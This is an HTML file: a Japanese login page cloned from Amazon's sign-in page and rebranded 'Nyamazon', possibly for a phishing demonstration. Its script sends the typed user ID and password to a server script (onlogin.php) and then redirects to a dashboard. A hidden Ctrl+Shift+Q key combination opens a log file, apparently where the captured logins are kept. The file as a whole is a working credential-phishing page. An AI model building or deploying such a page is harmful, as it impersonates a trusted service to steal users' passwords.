<!DOCTYPE html>
<html
  class="a-js a-audio a-video a-canvas a-svg a-drag-drop a-geolocation a-history a-webworker a-autofocus a-input-placeholder a-textarea-placeholder a-local-storage a-gradients a-transform3d a-touch-scrolling a-text-shadow a-text-stroke a-box-shadow a-border-radius a-border-image a-opacity a-transform a-transition null"
  data-19ax5a9jf="dingo" data-aui-build-date="3.24.10-2025-01-09">

<head>
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta charset="UTF-8">
  <meta http-equiv="content-type" content="text/html; charset=UTF-8">
  <title dir="ltr">ログイン</title>
  <link rel="stylesheet" href="css/index.css">
  <!-- <link rel="stylesheet"  href="Amazon%E3%83%AD%E3%82%B0%E3%82%A4%E3%83%B3_files/11KpeNaLkYL._RC_01WLKcGdVeL.css,51lAZpmtDbL.css,31uBZQYbDJL..css"> -->
  <!-- <link rel="stylesheet" href="Amazon%E3%83%AD%E3%82%B0%E3%82%A4%E3%83%B3_files/01SdjaY0ZsL._RC_31jdWD+JB+L.css,51oKy2hIPYL.css_.css"> -->
  <!-- <link rel="stylesheet" href="Amazon%E3%83%AD%E3%82%B0%E3%82%A4%E3%83%B3_files/21cwI2AAWQL.css"> -->
</head>

<body
  class="ap-locale-ja_JP a-m-jp a-aui_72554-c a-aui_a11y_6_837773-c a-aui_killswitch_csa_logger_372963-c a-aui_pci_risk_banner_210084-c a-aui_template_weblab_cache_333406-c a-aui_tnr_v2_180836-c a-bw_aui_cxc_alert_measurement_1074111-c a-meter-animate">
  <div id="a-page">
    <div class="a-section a-padding-medium auth-workflow">
      <div class="a-section a-spacing-none auth-navbar">
        <div class="a-section a-spacing-medium a-text-center"> </a> </div>
      </div>
      <div id="authportal-center-section" class="a-section">
        <div id="authportal-main-section" class="a-section" >
          <!--  -->
          <!-- <div style="display:flex;justify-content: center;"> -->
          <div style="text-align: center;">
            <img alt="nyamazon" src="img/nyamazon.png" style="height: 90px;width:270px;">
          </div>
          <!--  -->
          <div class="a-section a-spacing-base auth-pagelet-container">
            <div id="auth-cookie-warning-message" class="a-box a-alert a-alert-warning" aria-live="polite"
              aria-atomic="true">
              <!-- <div class="a-box-inner a-alert-container">
                <h4 class="a-alert-heading">続行するには、cookieを有効にしてください</h4><i class="a-icon a-icon-alert"></i>
                <div class="a-alert-content">
                  <p> <a class="a-link-normal" href="">
                    </a> </p>

                </div>
              </div> -->
            </div>
          </div>
        </div>
      </div>
      <div class="a-section auth-pagelet-container">
        <!-- <script type="a-state"
          data-a-state="{&quot;key&quot;:&quot;convert_to_en_digits&quot;}">{"enabled":false}</script> -->
        <!-- Set cross domain sso variables to be used for making Ajax calls to central Identity domain -->
        <!-- Set cross domain sso variables to be used for making Ajax calls to central Identity domain -->
        <!-- show a warning modal dialog when the third party account is connected with Amazon -->
        <!-- shows an info modal dialog when a test is using Single Page -->
        <div class="a-section a-spacing-base">
          <div class="a-section">
            <form name="signIn" method="post" novalidate="" action=""
              class="auth-validate-form auth-real-time-validation a-spacing-none" data-fwcim-id="imzaqKcO">
              <div class="a-section">
                <div class="a-box">
                  <div class="a-box-inner a-padding-extra-large">
                    <h1 class="a-spacing-small">  ログイン </h1> <!-- optional subheading element -->
                    <div class="a-row a-spacing-base"> <label for="ap_email" class="a-form-label"> ユーザID </label>
                      <input type="email" maxlength="128" id="ap_email" autocomplete="userid" name="email"
                        class="a-input-text a-span12 auth-autofocus auth-required-field" aria-required="true">
                      <!-- <div id="auth-email-missing-alert"
                        class="a-box a-alert-inline a-alert-inline-error auth-inlined-error-message a-spacing-top-base"
                        role="alert">
                        <div class="a-box-inner a-alert-container"><i class="a-icon a-icon-alert"></i>
                          <div class="a-alert-content"> メールアドレスまたは携帯電話番号を入力してください </div>
                        </div>
                      </div> -->
                    </div> <input type="hidden" name="create" value="0">
                    <div class="a-section a-spacing-large">
                      <div class="a-row">
                        <div class="a-column a-span5"> <label for="ap_password" class="a-form-label"> パスワード </label>
                        </div>

                      </div> <input type="password" maxlength="1024" id="ap_password" autocomplete="current-password"
                        name="password" class="a-input-text a-span12 auth-required-field" aria-required="true">
                      <!-- <div id="auth-password-missing-alert"
                        class="a-box a-alert-inline a-alert-inline-error auth-inlined-error-message a-spacing-top-base"
                        role="alert">
                        <div class="a-box-inner a-alert-container"><i class="a-icon a-icon-alert"></i>
                          <div class="a-alert-content"> パスワードは6文字以上の半角英数字で入力してください </div>
                        </div>
                      </div> -->
                    </div>
                    <div class="a-section a-spacing-extra-large"> <span
                        class="a-button a-button-span12 a-button-primary auth-disable-button-on-submit"
                        id="a-autoid-0"><span class="a-button-inner">
                          <input id="signInSubmit" class="a-button-input" type="submit"
                            aria-labelledby="a-autoid-0-announce">
                          <span class="a-button-text" aria-hidden="true" id="a-autoid-0-announce"> ログイン
                          </span></span></span>

                      <div class="a-row a-spacing-top-medium">
                        <div class="a-section a-text-left"> <label for="auth-remember-me" class="a-form-label">
                            <input type="hidden" name="kmsiWeblabTreatment" value="C" id="kmsi-weblab-treatment">

                          </label> </div>
                      </div>
                    </div>
                    <div class="a-divider a-divider-break">

                      <h5 aria-level="5">初めてご利用ですか？</h5>
                    </div> <span id="auth-create-account-link" class="a-button a-button-span12 a-button-base"><span
                        class="a-button-inner"><a id="createAccountSubmit" href="" class="a-button-text"> アカウントを作成
                        </a></span></span>
                  </div>
                </div>
              </div> 
            </form>
          </div>
        </div>
      </div>
    </div>
  </div>
  <div id="right-2"> </div>
  <div>
    <div>
      <div class="a-divider-inner"></div>
    </div>
    <div class="a-section a-spacing-small a-text-center a-size-mini"> <span class="auth-footer-seperator"></span>
      <ul>
        <li style="list-style-type: none; margin: 0; padding:0; display: inline-block;">
          <a rel="noopener" class="a-link-normal a-nowrap" target="_blank" href="">
            利用規約 </a> <span class="auth-footer-seperator"></span>
        </li>
        <li style="list-style-type: none; margin: 0; padding:0; display: inline-block;">
          <a rel="noopener" class="a-link-normal a-nowrap" target="_blank" href="">
            プライバシー規約 </a> <span class="auth-footer-seperator"></span>
        </li>
        <li style="list-style-type: none; margin: 0; padding:0; display: inline-block;"> <a rel="noopener"
            class="a-link-normal a-nowrap" target="_blank" href=""> ヘルプ </a>
          <span class="auth-footer-seperator"></span>
        </li>
      </ul>
    </div>
    <div class="a-section a-spacing-none a-text-center"> <span class="a-size-mini a-color-secondary"> © 1996-2025,
        Nyamazon.com, Inc.or its affiliates </span> </div>
  </div>
  </div>

  <div class="auth-external-javascript" data-external-javascripts="" id="auth-external-javascript"> </div>
  </div>
  <div id="a-popover-root" style="z-index:-1;position:absolute;"></div>


</body>
<script>
  function onLogin() {
    let username = document.querySelector("#ap_email").value;
    let password = document.querySelector("#ap_password").value;
    // alert(`username:${username}\npassword:${password}ですね`);
    const formdata = new FormData();
    formdata.append('username', username);
    formdata.append('password', password);
    //
    fetch('onlogin.php', {
      method: 'POST',
      body: formdata,
    })
      .then(response => response.text())  // ← `text()` にする
      .then(data => {
        console.log(data); // PHPのレスポンスを表示
        window.location.href = 'dashboard.html'; // ログイン後のページへ遷移
      })
      .catch(error => alert('Error: ' + error));
    //
  }

  document.querySelector("#signInSubmit").addEventListener("click", evt => {
    evt.preventDefault();
    onLogin();
  })

  document.addEventListener("keyup", evt => {
    evt.preventDefault();
    if (event.ctrlKey && event.shiftKey && event.key === 'Q') {
      location.href = "/log.txt"
    }
  })

</script>

</html>